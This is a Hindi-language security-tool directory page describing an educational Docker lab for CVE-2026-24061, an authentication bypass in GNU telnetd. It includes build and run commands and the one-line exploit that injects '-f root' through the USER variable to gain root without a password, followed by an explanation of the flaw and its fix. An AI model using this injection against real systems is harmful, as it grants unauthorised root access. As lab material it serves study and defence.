Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-24061_Lab — # CVE-2026-24061 के लिए शैक्षिक Docker लैब GNU telnetd में प्रमाणीकरण बायपास का प्रदर्शन करने वाला शैक्षिक Docker लैब, जो USER पर्यावरण चर में तर्क इंजेक्शन के माध्यम से रूट एक्सेस की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/gabs-hub/cve-2026-24061_lab
भेद्यता विश्लेषणशोषणप्रमाणीकरणलर्निंग और शिक्षालैब और अभ्यास
GitHubgabs-hub/cve-2026-24061_lab

CVE-2026-24061_Lab

# CVE-2026-24061 के लिए शैक्षिक Docker लैब GNU telnetd में प्रमाणीकरण बायपास का प्रदर्शन करने वाला शैक्षिक Docker लैब, जो USER पर्यावरण चर में तर्क इंजेक्शन के माध्यम से रूट एक्सेस की अनुमति देता है।

रिपॉजिटरी देखें
168 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-24061 Telnetd लैब

इस रिपॉजिटरी में CVE-2026-24061 भेद्यता को प्रदर्शित करने के लिए एक सरल Docker लैब शामिल है। यह लिनक्स पर GNU telnetd में प्रमाणीकरण बायपास और root के रूप में पहुंच की अनुमति देता है।

इसका उद्देश्य पूर्णतः शैक्षिक है।

आवश्यकताएँ

  • Docker स्थापित
  • Telnet क्लाइंट स्थापित

इमेज का बिल्ड

docker build -t cve-2026-24061 .

कंटेनर का निष्पादन

docker run -it -p 2323:23 cve-2026-24061

शोषण

दूसरे टर्मिनल में, निम्नलिखित चलाएँ:

USER="-f root" telnet -a localhost 2323

इसके बाद, पासवर्ड मांगे बिना सीधे root के रूप में पहुंच प्रदान की जाएगी।

टिप्पणियाँ

  • कंटेनर GNU inetutils telnetd का एक भेद्य संस्करण उपयोग करता है
  • Telnet सेवा को वास्तविक वातावरण में उजागर नहीं किया जाना चाहिए
  • इस लैब का उपयोग केवल अध्ययन और प्रदर्शन के लिए करें

भेद्यता कैसे काम करती है?

यह दोष /usr/bin/login उपयोगिता के आह्वान के दौरान तर्क इंजेक्शन के कारण उत्पन्न होता है। telnetd लॉगिन को कॉल करने के लिए उपयोग की जाने वाली कमांड लाइन को गतिशील रूप से बनाता है और प्लेसहोल्डर %U के माध्यम से USER पर्यावरण चर का मान शामिल करता है, बिना किसी सैनिटाइज़ेशन के।

चूंकि लॉगिन उपयोगिता -f विकल्प स्वीकार करती है, जो पासवर्ड प्रमाणीकरण को अनदेखा करता है, एक हमलावर USER="-f root" सेट कर सकता है और सीधे root के रूप में लॉगिन को बाध्य कर सकता है।

चूंकि telnetd उच्च विशेषाधिकारों के साथ चलता है, यह हेरफेर तुरंत वैध क्रेडेंशियल्स की आवश्यकता के बिना root शेल में परिणत होता है। शोषण सरल है, पूर्व इंटरैक्शन की आवश्यकता नहीं है, और इसे आसानी से स्वचालित किया जा सकता है, जो CVSS 9.8 स्कोर को उचित ठहराता है।

USER चर के सत्यापन और सैनिटाइज़ेशन की शुरुआत के साथ भेद्यता को ठीक किया गया था, जो हाइफ़न से शुरू होने वाले मानों और विशेष वर्णों को अवरुद्ध करता है, जिससे लॉगिन में तर्क इंजेक्शन रोका जा सके।

टूल डाउनलोड करें